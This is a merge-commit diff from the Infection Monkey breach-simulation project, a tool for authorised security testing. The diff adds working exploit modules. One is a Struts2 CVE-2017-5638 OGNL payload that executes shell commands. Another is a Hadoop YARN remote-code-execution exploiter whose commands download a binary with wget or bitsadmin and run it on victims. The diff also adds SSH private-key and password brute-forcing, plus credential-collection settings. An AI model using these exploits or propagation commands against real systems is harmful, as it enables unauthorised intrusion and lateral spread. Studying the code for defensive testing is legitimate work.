Merge branch 'develop' of https://github.com/guardicore/monkey into develop

# Conflicts:
#	infection_monkey/model/__init__.py
#	monkey_island/cc/ui/package-lock.json
This commit is contained in:
VakarisZ 2018-09-13 12:50:09 +03:00
commit 33c4a93ad7
75 changed files with 13555 additions and 6851 deletions

View File

@ -4,6 +4,7 @@ import struct
from abc import ABCMeta, abstractmethod from abc import ABCMeta, abstractmethod
import ipaddress import ipaddress
from six import text_type
__author__ = 'itamar' __author__ = 'itamar'
@ -65,7 +66,7 @@ class CidrRange(NetworkRange):
def __init__(self, cidr_range, shuffle=True): def __init__(self, cidr_range, shuffle=True):
super(CidrRange, self).__init__(shuffle=shuffle) super(CidrRange, self).__init__(shuffle=shuffle)
self._cidr_range = cidr_range.strip() self._cidr_range = cidr_range.strip()
self._ip_network = ipaddress.ip_network(unicode(self._cidr_range), strict=False) self._ip_network = ipaddress.ip_network(text_type(self._cidr_range), strict=False)
def __repr__(self): def __repr__(self):
return "<CidrRange %s>" % (self._cidr_range,) return "<CidrRange %s>" % (self._cidr_range,)

View File

@ -7,8 +7,9 @@ from abc import ABCMeta
from itertools import product from itertools import product
from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter, ShellShockExploiter, \ from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter, ShellShockExploiter, \
SambaCryExploiter, ElasticGroovyExploiter SambaCryExploiter, ElasticGroovyExploiter, Struts2Exploiter, WebLogicExploiter, HadoopExploiter
from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger, \
MSSQLFinger
__author__ = 'itamar' __author__ = 'itamar'
@ -40,7 +41,7 @@ def _cast_by_example(value, example):
return int(value) return int(value)
elif example_type is float: elif example_type is float:
return float(value) return float(value)
elif example_type is types.ClassType or example_type is ABCMeta: elif example_type in (type, ABCMeta):
return globals()[value] return globals()[value]
else: else:
return None return None
@ -84,10 +85,10 @@ class Configuration(object):
if val_type is types.FunctionType or val_type is types.MethodType: if val_type is types.FunctionType or val_type is types.MethodType:
continue continue
if val_type is types.ClassType or val_type is ABCMeta: if val_type in (type, ABCMeta):
value = value.__name__ value = value.__name__
elif val_type is tuple or val_type is list: elif val_type is tuple or val_type is list:
if len(value) != 0 and (type(value[0]) is types.ClassType or type(value[0]) is ABCMeta): if len(value) != 0 and type(value[0]) in (type, ABCMeta):
value = val_type([x.__name__ for x in value]) value = val_type([x.__name__ for x in value])
result[key] = value result[key] = value
@ -145,10 +146,10 @@ class Configuration(object):
max_iterations = 1 max_iterations = 1
scanner_class = TcpScanner scanner_class = TcpScanner
finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger, MySQLFinger, ElasticFinger] finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger, MySQLFinger, ElasticFinger, MSSQLFinger]
exploiter_classes = [SmbExploiter, WmiExploiter, # Windows exploits exploiter_classes = [SmbExploiter, WmiExploiter, # Windows exploits
SSHExploiter, ShellShockExploiter, SambaCryExploiter, # Linux SSHExploiter, ShellShockExploiter, SambaCryExploiter, # Linux
ElasticGroovyExploiter, # multi ElasticGroovyExploiter, Struts2Exploiter, WebLogicExploiter, HadoopExploiter # multi
] ]
# how many victims to look for in a single scan iteration # how many victims to look for in a single scan iteration
@ -163,7 +164,7 @@ class Configuration(object):
# Configuration servers to try to connect to, in this order. # Configuration servers to try to connect to, in this order.
command_servers = [ command_servers = [
"41.50.73.31:5000" "192.0.2.0:5000"
] ]
# sets whether or not to locally save the running configuration after finishing # sets whether or not to locally save the running configuration after finishing
@ -184,13 +185,15 @@ class Configuration(object):
# Auto detect and scan local subnets # Auto detect and scan local subnets
local_network_scan = True local_network_scan = True
subnet_scan_list = ['', ] subnet_scan_list = []
inaccessible_subnets = []
blocked_ips = ['', ] blocked_ips = []
# TCP Scanner # TCP Scanner
HTTP_PORTS = [80, 8080, 443, HTTP_PORTS = [80, 8080, 443,
8008, # HTTP alternate 8008, # HTTP alternate
7001 # Oracle Weblogic default server port
] ]
tcp_target_ports = [22, tcp_target_ports = [22,
2222, 2222,
@ -233,6 +236,12 @@ class Configuration(object):
""" """
return product(self.exploit_user_list, self.exploit_password_list) return product(self.exploit_user_list, self.exploit_password_list)
def get_exploit_user_ssh_key_pairs(self):
"""
:return: All combinations of the configurations users and ssh pairs
"""
return product(self.exploit_user_list, self.exploit_ssh_keys)
def get_exploit_user_password_or_hash_product(self): def get_exploit_user_password_or_hash_product(self):
""" """
Returns all combinations of the configurations users and passwords or lm/ntlm hashes Returns all combinations of the configurations users and passwords or lm/ntlm hashes
@ -251,6 +260,7 @@ class Configuration(object):
exploit_password_list = ["Password1!", "1234", "password", "12345678"] exploit_password_list = ["Password1!", "1234", "password", "12345678"]
exploit_lm_hash_list = [] exploit_lm_hash_list = []
exploit_ntlm_hash_list = [] exploit_ntlm_hash_list = []
exploit_ssh_keys = []
# smb/wmi exploiter # smb/wmi exploiter
smb_download_timeout = 300 # timeout in seconds smb_download_timeout = 300 # timeout in seconds
@ -265,13 +275,12 @@ class Configuration(object):
# system info collection # system info collection
collect_system_info = True collect_system_info = True
should_use_mimikatz = True
########################### ###########################
# systeminfo config # systeminfo config
########################### ###########################
mimikatz_dll_name = "mk.dll"
extract_azure_creds = True extract_azure_creds = True

View File

@ -9,6 +9,7 @@ import sys
import time import time
from ctypes import c_char_p from ctypes import c_char_p
import filecmp
from config import WormConfiguration from config import WormConfiguration
from exploit.tools import build_monkey_commandline_explicitly from exploit.tools import build_monkey_commandline_explicitly
from model import MONKEY_CMDLINE_WINDOWS, MONKEY_CMDLINE_LINUX, GENERAL_CMDLINE_LINUX from model import MONKEY_CMDLINE_WINDOWS, MONKEY_CMDLINE_LINUX, GENERAL_CMDLINE_LINUX
@ -56,7 +57,10 @@ class MonkeyDrops(object):
return False return False
# we copy/move only in case path is different # we copy/move only in case path is different
file_moved = os.path.samefile(self._config['source_path'], self._config['destination_path']) try:
file_moved = filecmp.cmp(self._config['source_path'], self._config['destination_path'])
except OSError:
file_moved = False
if not file_moved and os.path.exists(self._config['destination_path']): if not file_moved and os.path.exists(self._config['destination_path']):
os.remove(self._config['destination_path']) os.remove(self._config['destination_path'])

View File

@ -1,17 +1,18 @@
{ {
"command_servers": [ "command_servers": [
"41.50.73.31:5000" "192.0.2.0:5000"
], ],
"internet_services": [ "internet_services": [
"monkey.guardicore.com", "monkey.guardicore.com",
"www.google.com" "www.google.com"
], ],
"keep_tunnel_open_time": 60, "keep_tunnel_open_time": 60,
"subnet_scan_list": [ "subnet_scan_list": [
""
], ],
"blocked_ips": [""], "inaccessible_subnets": [],
"current_server": "41.50.73.31:5000", "blocked_ips": [],
"current_server": "192.0.2.0:5000",
"alive": true, "alive": true,
"collect_system_info": true, "collect_system_info": true,
"extract_azure_creds": true, "extract_azure_creds": true,
@ -37,14 +38,18 @@
"ShellShockExploiter", "ShellShockExploiter",
"ElasticGroovyExploiter", "ElasticGroovyExploiter",
"SambaCryExploiter", "SambaCryExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter"
], ],
"finger_classes": [ "finger_classes": [
"SSHFinger", "SSHFinger",
"PingScanner", "PingScanner",
"HTTPFinger", "HTTPFinger",
"SMBFinger", "SMBFinger",
"MySQLFinger" "MySQLFinger",
"ElasticFinger", "MSSQLFingerprint",
"ElasticFinger"
], ],
"max_iterations": 3, "max_iterations": 3,
"monkey_log_path_windows": "%temp%\\~df1563.tmp", "monkey_log_path_windows": "%temp%\\~df1563.tmp",
@ -67,6 +72,7 @@
"exploit_password_list": [], "exploit_password_list": [],
"exploit_lm_hash_list": [], "exploit_lm_hash_list": [],
"exploit_ntlm_hash_list": [], "exploit_ntlm_hash_list": [],
"exploit_ssh_keys": [],
"sambacry_trigger_timeout": 5, "sambacry_trigger_timeout": 5,
"sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"], "sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"],
"sambacry_shares_not_to_check": ["IPC$", "print$"], "sambacry_shares_not_to_check": ["IPC$", "print$"],
@ -84,7 +90,8 @@
443, 443,
3306, 3306,
8008, 8008,
9200 9200,
7001
], ],
"timeout_between_iterations": 10, "timeout_between_iterations": 10,
"use_file_logging": true, "use_file_logging": true,

View File

@ -24,9 +24,9 @@ class HostExploiter(object):
{'result': result, 'machine': self.host.__dict__, 'exploiter': self.__class__.__name__, {'result': result, 'machine': self.host.__dict__, 'exploiter': self.__class__.__name__,
'info': self._exploit_info, 'attempts': self._exploit_attempts}) 'info': self._exploit_info, 'attempts': self._exploit_attempts})
def report_login_attempt(self, result, user, password, lm_hash='', ntlm_hash=''): def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''):
self._exploit_attempts.append({'result': result, 'user': user, 'password': password, self._exploit_attempts.append({'result': result, 'user': user, 'password': password,
'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash}) 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
@abstractmethod @abstractmethod
def exploit_host(self): def exploit_host(self):
@ -41,3 +41,6 @@ from sshexec import SSHExploiter
from shellshock import ShellShockExploiter from shellshock import ShellShockExploiter
from sambacry import SambaCryExploiter from sambacry import SambaCryExploiter
from elasticgroovy import ElasticGroovyExploiter from elasticgroovy import ElasticGroovyExploiter
from struts2 import Struts2Exploiter
from weblogic import WebLogicExploiter
from hadoop import HadoopExploiter

View File

@ -6,225 +6,52 @@
import json import json
import logging import logging
import requests import requests
from exploit.web_rce import WebRCE
from model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP
from network.elasticfinger import ES_PORT, ES_SERVICE
from exploit import HostExploiter import re
from model import DROPPER_ARG
from network.elasticfinger import ES_SERVICE, ES_PORT
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
__author__ = 'danielg' __author__ = 'danielg, VakarisZ'
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
class ElasticGroovyExploiter(HostExploiter): class ElasticGroovyExploiter(WebRCE):
# attack URLs # attack URLs
BASE_URL = 'http://%s:%s/_search?pretty'
MONKEY_RESULT_FIELD = "monkey_result" MONKEY_RESULT_FIELD = "monkey_result"
GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
JAVA_IS_VULNERABLE = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.Runtime\\")'
JAVA_GET_TMP_DIR = \
GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"java.io.tmpdir\\")'
JAVA_GET_OS = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"os.name\\")'
JAVA_CMD = GENERIC_QUERY \ JAVA_CMD = GENERIC_QUERY \
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m'
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
_TARGET_OS_TYPE = ['linux', 'windows'] _TARGET_OS_TYPE = ['linux', 'windows']
def __init__(self, host): def __init__(self, host):
super(ElasticGroovyExploiter, self).__init__(host) super(ElasticGroovyExploiter, self).__init__(host)
self._config = __import__('config').WormConfiguration
self.skip_exist = self._config.skip_exploit_if_file_exist
def is_os_supported(self): def get_exploit_config(self):
""" exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
Checks if the host is vulnerable. exploit_config['dropper'] = True
Either using version string or by trying to attack exploit_config['url_extensions'] = ['_search?pretty']
:return: exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': RDP_CMDLINE_HTTP}
""" return exploit_config
if not super(ElasticGroovyExploiter, self).is_os_supported():
return False
if ES_SERVICE not in self.host.services: def get_open_service_ports(self, port_list, names):
LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr) # We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service
return False valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names)
major, minor, build = self.host.services[ES_SERVICE]['version'].split('.') if ES_SERVICE in self.host.services:
major = int(major) valid_ports.append([ES_PORT, False])
minor = int(minor) return valid_ports
build = int(build)
if major > 1:
return False
if major == 1 and minor > 4:
return False
if major == 1 and minor == 4 and build > 2:
return False
return self.is_vulnerable()
def exploit_host(self): def exploit(self, url, command):
real_host_os = self.get_host_os() command = re.sub(r"\\", r"\\\\\\\\", command)
self.host.os['type'] = str(real_host_os.lower()) # strip unicode characters
if 'linux' in self.host.os['type']:
return self.exploit_host_linux()
else:
return self.exploit_host_windows()
def exploit_host_windows(self):
"""
TODO
Will exploit windows similar to smbexec
:return:
"""
return False
def exploit_host_linux(self):
"""
Exploits linux using similar flow to sshexec and shellshock.
Meaning run remote commands to copy files over HTTP
:return:
"""
uname_machine = str(self.get_linux_arch())
if len(uname_machine) != 0:
self.host.os['machine'] = str(uname_machine.lower().strip()) # strip unicode characters
dropper_target_path_linux = self._config.dropper_target_path_linux
if self.skip_exist and (self.check_if_remote_file_exists_linux(dropper_target_path_linux)):
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
return True # return already infected
src_path = get_target_monkey(self.host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
if not self.download_file_in_linux(src_path, target_path=dropper_target_path_linux):
return False
self.set_file_executable_linux(dropper_target_path_linux)
self.run_monkey_linux(dropper_target_path_linux)
if not (self.check_if_remote_file_exists_linux(self._config.monkey_log_path_linux)):
LOG.info("Log file does not exist, monkey might not have run")
return True
def run_monkey_linux(self, dropper_target_path_linux):
"""
Runs the monkey
"""
cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1, location=dropper_target_path_linux)
cmdline += ' & '
self.run_shell_command(cmdline)
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux, self.host, cmdline)
if not (self.check_if_remote_file_exists_linux(self._config.dropper_log_path_linux)):
LOG.info("Log file does not exist, monkey might not have run")
def download_file_in_linux(self, src_path, target_path):
"""
Downloads a file in target machine using curl to the given target path
:param src_path: File path relative to the monkey
:param target_path: Target path in linux victim
:return: T/F
"""
http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
if not http_path:
LOG.debug("Exploiter %s failed, http transfer creation failed." % self.__name__)
return False
download_command = '/usr/bin/curl %s -o %s' % (
http_path, target_path)
self.run_shell_command(download_command)
http_thread.join(self.DOWNLOAD_TIMEOUT)
http_thread.stop()
if (http_thread.downloads != 1) or (
'ELF' not in
self.check_if_remote_file_exists_linux(target_path)):
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
return False
return True
def set_file_executable_linux(self, file_path):
"""
Marks the given file as executable using chmod
:return: Nothing
"""
chmod = '/bin/chmod +x %s' % file_path
self.run_shell_command(chmod)
LOG.info("Marked file %s on host %s as executable", file_path, self.host)
def check_if_remote_file_exists_linux(self, file_path):
"""
:return:
"""
cmdline = '/usr/bin/head -c 4 %s' % file_path
return self.run_shell_command(cmdline)
def run_shell_command(self, command):
"""
Runs a single shell command and returns the result.
"""
payload = self.JAVA_CMD % command payload = self.JAVA_CMD % command
result = self.get_command_result(payload) response = requests.get(url, data=payload)
LOG.info("Ran the command %s on host %s", command, self.host)
return result
def get_linux_arch(self):
"""
Returns host as per uname -m
"""
return self.get_command_result(self.JAVA_GET_BIT_LINUX)
def get_host_tempdir(self):
"""
Returns where to write our file given our permissions
:return: Temp directory path in target host
"""
return self.get_command_result(self.JAVA_GET_TMP_DIR)
def get_host_os(self):
"""
:return: target OS
"""
return self.get_command_result(self.JAVA_GET_OS)
def is_vulnerable(self):
"""
Checks if a given elasticsearch host is vulnerable to the groovy attack
:return: True/False
"""
result_text = self.get_command_result(self.JAVA_IS_VULNERABLE)
return 'java.lang.Runtime' in result_text
def get_command_result(self, payload):
"""
Gets the result of an attack payload with a single return value.
:param payload: Payload that fits the GENERIC_QUERY template.
"""
result = self.attack_query(payload)
if not result: # not vulnerable
return ""
return result[0]
def attack_query(self, payload):
"""
Wraps the requests query and the JSON parsing.
Just reduce opportunity for bugs
:return: List of data fields or None
"""
response = requests.get(self.attack_url(), data=payload)
result = self.get_results(response) result = self.get_results(response)
return result if not result:
return False
def attack_url(self): return result[0]
"""
Composes the URL to attack per host IP and port.
:return: Elasticsearch vulnerable URL
"""
return self.BASE_URL % (self.host.ip_addr, ES_PORT)
def get_results(self, response): def get_results(self, response):
""" """

View File

@ -0,0 +1,100 @@
"""
Remote code execution on HADOOP server with YARN and default settings
Implementation is based on code from https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
"""
import requests
import json
import random
import string
import logging
from exploit.web_rce import WebRCE
from tools import HTTPTools, build_monkey_commandline, get_monkey_depth
import posixpath
from model import MONKEY_ARG, ID_STRING
__author__ = 'VakarisZ'
LOG = logging.getLogger(__name__)
class HadoopExploiter(WebRCE):
_TARGET_OS_TYPE = ['linux', 'windows']
HADOOP_PORTS = [["8088", False]]
# We need to prevent from downloading if monkey already exists because hadoop uses multiple threads/nodes
# to download monkey at the same time
LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
"&& wget -O %(monkey_path)s %(http_path)s " \
"; chmod +x %(monkey_path)s " \
"&& %(monkey_path)s %(monkey_type)s %(parameters)s"
WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
" Update /download /priority high %(http_path)s %(monkey_path)s " \
"& %(monkey_path)s %(monkey_type)s %(parameters)s"
# How long we have our http server open for downloads in seconds
DOWNLOAD_TIMEOUT = 60
# Random string's length that's used for creating unique app name
RAN_STR_LEN = 6
def __init__(self, host):
super(HadoopExploiter, self).__init__(host)
def exploit_host(self):
# Try to get exploitable url
urls = self.build_potential_urls(self.HADOOP_PORTS)
self.add_vulnerable_urls(urls, True)
if not self.vulnerable_urls:
return False
paths = self.get_monkey_paths()
if not paths:
return False
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths['src_path'])
command = self.build_command(paths['dest_path'], http_path)
if not self.exploit(self.vulnerable_urls[0], command):
return False
http_thread.join(self.DOWNLOAD_TIMEOUT)
http_thread.stop()
return True
def exploit(self, url, command):
# Get the newly created application id
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"))
resp = json.loads(resp.content)
app_id = resp['application-id']
# Create a random name for our application in YARN
rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in xrange(self.RAN_STR_LEN)])
payload = self.build_payload(app_id, rand_name, command)
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload)
return resp.status_code == 202
def check_if_exploitable(self, url):
try:
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"))
except requests.ConnectionError:
return False
return resp.status_code == 200
def build_command(self, path, http_path):
# Build command to execute
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
if 'linux' in self.host.os['type']:
base_command = self.LINUX_COMMAND
else:
base_command = self.WINDOWS_COMMAND
return base_command % {"monkey_path": path, "http_path": http_path,
"monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
@staticmethod
def build_payload(app_id, name, command):
payload = {
"application-id": app_id,
"application-name": name,
"am-container-spec": {
"commands": {
"command": command,
}
},
"application-type": "YARN"
}
return payload

View File

@ -27,7 +27,7 @@ LOG = getLogger(__name__)
def twisted_log_func(*message, **kw): def twisted_log_func(*message, **kw):
if kw.has_key('isError') and kw['isError']: if kw.get('isError'):
error_msg = 'Unknown' error_msg = 'Unknown'
if 'failure' in kw: if 'failure' in kw:
error_msg = kw['failure'].getErrorMessage() error_msg = kw['failure'].getErrorMessage()

View File

@ -19,7 +19,8 @@ import monkeyfs
from exploit import HostExploiter from exploit import HostExploiter
from model import DROPPER_ARG from model import DROPPER_ARG
from network.smbfinger import SMB_SERVICE from network.smbfinger import SMB_SERVICE
from tools import build_monkey_commandline, get_target_monkey_by_os, get_binaries_dir_path, get_monkey_depth from tools import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth
from pyinstaller_utils import get_binary_file_path
__author__ = 'itay.mizeretz' __author__ = 'itay.mizeretz'
@ -306,9 +307,9 @@ class SambaCryExploiter(HostExploiter):
def get_monkey_runner_bin_file(self, is_32bit): def get_monkey_runner_bin_file(self, is_32bit):
if is_32bit: if is_32bit:
return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_32), "rb") return open(get_binary_file_path(self.SAMBACRY_RUNNER_FILENAME_32), "rb")
else: else:
return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_64), "rb") return open(get_binary_file_path(self.SAMBACRY_RUNNER_FILENAME_64), "rb")
def get_monkey_commandline_file(self, location): def get_monkey_commandline_file(self, location):
return BytesIO(DROPPER_ARG + build_monkey_commandline(self.host, get_monkey_depth() - 1, location)) return BytesIO(DROPPER_ARG + build_monkey_commandline(self.host, get_monkey_depth() - 1, location))

View File

@ -8,7 +8,7 @@ import requests
from exploit import HostExploiter from exploit import HostExploiter
from exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth from exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
from model import MONKEY_ARG from model import DROPPER_ARG
from shellshock_resources import CGI_FILES from shellshock_resources import CGI_FILES
from tools import build_monkey_commandline from tools import build_monkey_commandline
@ -133,7 +133,7 @@ class ShellShockExploiter(HostExploiter):
self.attack_page(url, header, run_path) self.attack_page(url, header, run_path)
# run the monkey # run the monkey
cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG) cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1) + ' & ' cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1) + ' & '
run_path = exploit + cmdline run_path = exploit + cmdline
self.attack_page(url, header, run_path) self.attack_page(url, header, run_path)

View File

@ -2,6 +2,7 @@ import logging
import time import time
import paramiko import paramiko
import StringIO
import monkeyfs import monkeyfs
from exploit import HostExploiter from exploit import HostExploiter
@ -31,6 +32,65 @@ class SSHExploiter(HostExploiter):
LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total) LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
self._update_timestamp = time.time() self._update_timestamp = time.time()
def exploit_with_ssh_keys(self, port, ssh):
user_ssh_key_pairs = self._config.get_exploit_user_ssh_key_pairs()
exploited = False
for user, ssh_key_pair in user_ssh_key_pairs:
# Creating file-like private key for paramiko
pkey = StringIO.StringIO(ssh_key_pair['private_key'])
ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip'])
try:
pkey = paramiko.RSAKey.from_private_key(pkey)
except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
LOG.error("Failed reading ssh key")
try:
ssh.connect(self.host.ip_addr,
username=user,
pkey=pkey,
port=port,
timeout=None)
LOG.debug("Successfully logged in %s using %s users private key",
self.host, ssh_string)
exploited = True
self.report_login_attempt(True, user, ssh_key=ssh_string)
break
except Exception as exc:
LOG.debug("Error logging into victim %r with %s"
" private key", self.host,
ssh_string)
self.report_login_attempt(False, user, ssh_key=ssh_string)
continue
return exploited
def exploit_with_login_creds(self, port, ssh):
user_password_pairs = self._config.get_exploit_user_password_pairs()
exploited = False
for user, curpass in user_password_pairs:
try:
ssh.connect(self.host.ip_addr,
username=user,
password=curpass,
port=port,
timeout=None)
LOG.debug("Successfully logged in %r using SSH (%s : %s)",
self.host, user, curpass)
exploited = True
self.report_login_attempt(True, user, curpass)
break
except Exception as exc:
LOG.debug("Error logging into victim %r with user"
" %s and password '%s': (%s)", self.host,
user, curpass, exc)
self.report_login_attempt(False, user, curpass)
continue
return exploited
def exploit_host(self): def exploit_host(self):
ssh = paramiko.SSHClient() ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
@ -46,29 +106,10 @@ class SSHExploiter(HostExploiter):
LOG.info("SSH port is closed on %r, skipping", self.host) LOG.info("SSH port is closed on %r, skipping", self.host)
return False return False
user_password_pairs = self._config.get_exploit_user_password_pairs() #Check for possible ssh exploits
exploited = self.exploit_with_ssh_keys(port, ssh)
exploited = False if not exploited:
for user, curpass in user_password_pairs: exploited = self.exploit_with_login_creds(port, ssh)
try:
ssh.connect(self.host.ip_addr,
username=user,
password=curpass,
port=port,
timeout=None)
LOG.debug("Successfully logged in %r using SSH (%s : %s)",
self.host, user, curpass)
self.report_login_attempt(True, user, curpass)
exploited = True
break
except Exception as exc:
LOG.debug("Error logging into victim %r with user"
" %s and password '%s': (%s)", self.host,
user, curpass, exc)
self.report_login_attempt(False, user, curpass)
continue
if not exploited: if not exploited:
LOG.debug("Exploiter SSHExploiter is giving up...") LOG.debug("Exploiter SSHExploiter is giving up...")

View File

@ -0,0 +1,94 @@
"""
Implementation is based on Struts2 jakarta multiparser RCE exploit ( CVE-2017-5638 )
code used is from https://www.exploit-db.com/exploits/41570/
Vulnerable struts2 versions <=2.3.31 and <=2.5.10
"""
import urllib2
import httplib
import unicodedata
import re
import logging
from web_rce import WebRCE
__author__ = "VakarisZ"
LOG = logging.getLogger(__name__)
DOWNLOAD_TIMEOUT = 300
class Struts2Exploiter(WebRCE):
_TARGET_OS_TYPE = ['linux', 'windows']
def __init__(self, host):
super(Struts2Exploiter, self).__init__(host, None)
def get_exploit_config(self):
exploit_config = super(Struts2Exploiter, self).get_exploit_config()
exploit_config['dropper'] = True
return exploit_config
def build_potential_urls(self, ports, extensions=None):
"""
We need to override this method to get redirected url's
:param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
Eg. ports: [[80, False], [443, True]]
:param extensions: What subdirectories to scan. www.domain.com[/extension]
:return: Array of url's to try and attack
"""
url_list = super(Struts2Exploiter, self).build_potential_urls(ports)
url_list = [self.get_redirected(url) for url in url_list]
return url_list
@staticmethod
def get_redirected(url):
# Returns false if url is not right
headers = {'User-Agent': 'Mozilla/5.0'}
request = urllib2.Request(url, headers=headers)
try:
return urllib2.urlopen(request).geturl()
except urllib2.URLError:
LOG.error("Can't reach struts2 server")
return False
def exploit(self, url, cmd):
"""
:param url: Full url to send request to
:param cmd: Code to try and execute on host
:return: response
"""
cmd = re.sub(r"\\", r"\\\\", cmd)
cmd = re.sub(r"'", r"\\'", cmd)
payload = "%%{(#_='multipart/form-data')." \
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
"(#_memberAccess?" \
"(#_memberAccess=#dm):" \
"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \
"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \
"(#ognlUtil.getExcludedPackageNames().clear())." \
"(#ognlUtil.getExcludedClasses().clear())." \
"(#context.setMemberAccess(#dm))))." \
"(#cmd='%s')." \
"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." \
"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
"(#p=new java.lang.ProcessBuilder(#cmds))." \
"(#p.redirectErrorStream(true)).(#process=#p.start())." \
"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \
"(#ros.flush())}" % cmd
# Turns payload ascii just for consistency
if isinstance(payload, unicode):
payload = unicodedata.normalize('NFKD', payload).encode('ascii', 'ignore')
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
try:
request = urllib2.Request(url, headers=headers)
# Timeout added or else we would wait for all monkeys' output
page = urllib2.urlopen(request).read()
except AttributeError:
# If url does not exist
return False
except httplib.IncompleteRead as e:
page = e.partial
return page

View File

@ -21,7 +21,8 @@ import monkeyfs
from network import local_ips from network import local_ips
from network.firewall import app as firewall from network.firewall import app as firewall
from network.info import get_free_tcp_port, get_routes from network.info import get_free_tcp_port, get_routes
from transport import HTTPServer from transport import HTTPServer, LockedHTTPServer
from threading import Lock
class DceRpcException(Exception): class DceRpcException(Exception):
@ -386,6 +387,34 @@ class HTTPTools(object):
return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd
@staticmethod
def create_locked_transfer(host, src_path, local_ip=None, local_port=None):
"""
Create http server for file transfer with a lock
:param host: Variable with target's information
:param src_path: Monkey's path on current system
:param local_ip: IP where to host server
:param local_port: Port at which to host monkey's download
:return: Server address in http://%s:%s/%s format and LockedHTTPServer handler
"""
# To avoid race conditions we pass a locked lock to http servers thread
lock = Lock()
lock.acquire()
if not local_port:
local_port = get_free_tcp_port()
if not local_ip:
local_ip = get_interface_to_target(host.ip_addr)
if not firewall.listen_allowed():
LOG.error("Firewall is not allowed to listen for incomming ports. Aborting")
return None, None
httpd = LockedHTTPServer(local_ip, local_port, src_path, lock)
httpd.start()
lock.acquire()
